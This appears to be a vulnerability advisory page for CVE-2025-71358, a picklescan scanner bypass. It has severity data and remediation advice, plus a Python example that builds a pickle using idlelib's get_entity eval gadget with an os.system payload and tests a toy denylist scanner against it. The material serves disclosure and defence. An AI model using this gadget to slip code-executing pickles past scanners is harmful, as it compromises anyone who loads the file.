
picklescan CVE-2025-71358

EUVD-2025-210303 · HIGH
Deserialization of Untrusted Data (CWE-502)
2026-06-22 · VulnCheck
7.6 (CVSS 4.0 · Vendor: VulnCheck)

Severity by source

Vendor (VulnCheck) PRIMARY
7.6 HIGH
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-delivered malicious file (AV:N), reliable bypass once crafted (AC:L), no auth (PR:N), victim must load the file (UI:R), full code execution as user yields C/I/A:H.

CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS Vector (Vendor: VulnCheck)

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N (threat, environmental and supplemental metrics all X, i.e. not defined)
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: Present
Privileges Required: None
User Interaction: Passive
Vulnerable System Impact: Confidentiality High, Integrity High, Availability None
Subsequent System Impact: None (CVSS 4.0 has no Scope metric; it splits impact into vulnerable and subsequent systems instead)

Lifecycle Timeline

Patch available
Jun 22, 2026 - 23:02 EUVD
Source Code Evidence Fetched
Jun 22, 2026 - 22:16 vuln.today
Analysis Generated
Jun 22, 2026 - 22:16 vuln.today

Description (CVE.org)

picklescan before 0.0.29 fails to detect malicious pickle files that exploit idlelib.autocomplete.AutoComplete.get_entity function in reduce methods. Attackers can embed undetected code in pickle files that executes arbitrary commands when loaded by victims using pickle.load().

Analysis (AI)

Detection bypass in picklescan before 0.0.29 lets attackers smuggle a code-execution payload through a pickle file by naming the standard-library function idlelib.autocomplete.AutoComplete.get_entity as the callable in a __reduce__ tuple. Because picklescan did not list that function as dangerous, a malicious ML model file (e.g. a PyTorch checkpoint) scans as clean, yet the payload runs the moment the victim calls pickle.load(). Proof-of-concept code is published in the GHSA advisory; the CVE was not in CISA KEV at the time of analysis, i.e. no in-the-wild exploitation had been recorded.

Technical Context (AI)

picklescan is a Python scanner that walks the opcodes of a pickle stream and flags references to modules and callables it considers dangerous; it is mostly used to vet PyTorch and other ML model files before deserialization. The vulnerability is a classic CWE-502 (Deserialization of Untrusted Data) bypass. Pickle's __reduce__ protocol lets a pickled object name any importable callable, plus its arguments, to be invoked at load time (the GLOBAL/STACK_GLOBAL and REDUCE opcodes), and picklescan decides safety with a denylist, so a single unlisted callable that evaluates its argument is enough to defeat it. In CPython, idlelib.autocomplete.AutoComplete.get_entity(self, name) returns eval(name, ...) over the loaded modules and the __main__ namespace and never touches self, so a REDUCE of that function with a dummy self and a string such as "__import__('os').system('whoami')" passes scanning and detonates on pickle.load(). Because the gadget lives in the standard library, no third-party package needs to be present on the victim's machine; the import does pull in tkinter via idlelib, so it fires only on Python builds where tkinter is available.

Remediation (AI)

Vendor-released patch: upgrade picklescan to 0.0.29 or later (pip install --upgrade 'picklescan>=0.0.29'), which adds idlelib.autocomplete.AutoComplete.get_entity to the dangerous-callables list per commit aecd11be98702caa9ba9b12189d91ad596a36114. Consult the advisory at https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6w4w-5w54-rjvr for details. If an immediate upgrade is not possible, treat every unverified pickle/PyTorch file as untrusted and load it only through safer paths: prefer safetensors for model weights; use torch.load(..., weights_only=True) (available since PyTorch 1.13 and the default from 2.6), which rejects arbitrary callables but breaks models that rely on custom classes; or run pickle.load in a sandboxed, ephemeral container with no network access and no secrets, accepting the extra operational complexity and latency. As a stopgap, extend picklescan's denylist locally with idlelib.autocomplete.AutoComplete.get_entity, bearing in mind that a denylist can only ever catch the gadgets someone has already found, so other unknown bypass primitives may still exist.
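The following is an added example, not code from picklescan or from the advisory. It hand-assembles a protocol-4 pickle equivalent to the gadget described in the technical context above (idlelib.autocomplete.AutoComplete.get_entity invoked through REDUCE on an attacker-controlled string) and runs a toy picklescan-style opcode scanner over it twice: once with a denylist that lacks the idlelib entry, reproducing the bypass, and once with the entry the fix adds, which is the local stopgap the remediation mentions. The denylist entries, the 'id' command in the payload string and the benign dict are all constructed for illustration. The stream is only disassembled with pickletools and never passed to pickle.load(), so nothing executes and idlelib/tkinter is never imported.

```python
"""Gadget pickle for CVE-2025-71358 plus a toy opcode-level scanner.

Added example (not picklescan's code). The stream is disassembled, never
loaded, so running this file executes nothing attacker-controlled.
"""
import pickle
import pickletools

# In CPython, AutoComplete.get_entity(self, name) returns
# eval(name, {**sys.modules, **__main__.__dict__}) and ignores self,
# so None fills the self slot. 'id' is a constructed placeholder command.
GADGET_MODULE = "idlelib.autocomplete"
GADGET_NAME = "AutoComplete.get_entity"
PAYLOAD = "__import__('os').system('id')"


def short_binunicode(text: str) -> bytes:
    """SHORT_BINUNICODE opcode: 0x8c, one length byte, UTF-8 payload."""
    data = text.encode("utf-8")
    if len(data) > 255:
        raise ValueError("payload too long for SHORT_BINUNICODE")
    return b"\x8c" + bytes([len(data)]) + data


def build_gadget_pickle(module: str, name: str, payload: str) -> bytes:
    """Protocol-4 stream that unpickles to module.name(None, payload)."""
    return (
        b"\x80\x04"                  # PROTO 4
        + short_binunicode(module)   # push module path
        + short_binunicode(name)     # push attribute path inside the module
        + b"\x93"                    # STACK_GLOBAL -> resolve the callable
        + b"N"                       # NONE, dummy `self`
        + short_binunicode(payload)  # attacker-controlled eval() string
        + b"\x86"                    # TUPLE2 -> (None, payload)
        + b"R"                       # REDUCE -> callable(*args) at load time
        + b"."                       # STOP
    )


def extract_globals(stream: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the stream imports via GLOBAL or STACK_GLOBAL.

    Toy model: it only tracks str constants pushed directly. A production
    scanner must also follow MEMOIZE/BINGET so memoised strings that feed
    STACK_GLOBAL are not missed.
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(stream):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":           # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":     # protocol 4+: name on top, module below
            name, module = strings.pop(), strings.pop()
            found.append((module, name))
    return found


# Representative denylist entries (constructed), not picklescan's real list.
DENYLIST_BEFORE = {
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("os", "system"),
    ("subprocess", "Popen"),
}
DENYLIST_AFTER = DENYLIST_BEFORE | {(GADGET_MODULE, GADGET_NAME)}


def scan(stream: bytes, denylist: set[tuple[str, str]]) -> list[tuple[str, str]]:
    """Return the denylisted globals found in the stream; empty means 'clean'."""
    return [g for g in extract_globals(stream) if g in denylist]


EVIL = build_gadget_pickle(GADGET_MODULE, GADGET_NAME, PAYLOAD)
BENIGN = pickle.dumps({"weights": [0.5, -1.25]}, protocol=4)  # constructed sample

if __name__ == "__main__":
    pickletools.dis(EVIL)  # shows STACK_GLOBAL on idlelib.autocomplete then REDUCE
    print("before fix:", scan(EVIL, DENYLIST_BEFORE))  # [] -> the bypass
    print("after fix: ", scan(EVIL, DENYLIST_AFTER))
    print("benign:    ", scan(BENIGN, DENYLIST_AFTER))
```

The scan shows why a denylist is only as good as its last entry: the same stream, with identical REDUCE semantics, is "clean" or "dangerous" depending solely on whether the gadget's dotted path is present in the list. That is the reason the remediation prefers safetensors or weights_only loading over any scanner as the primary control.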
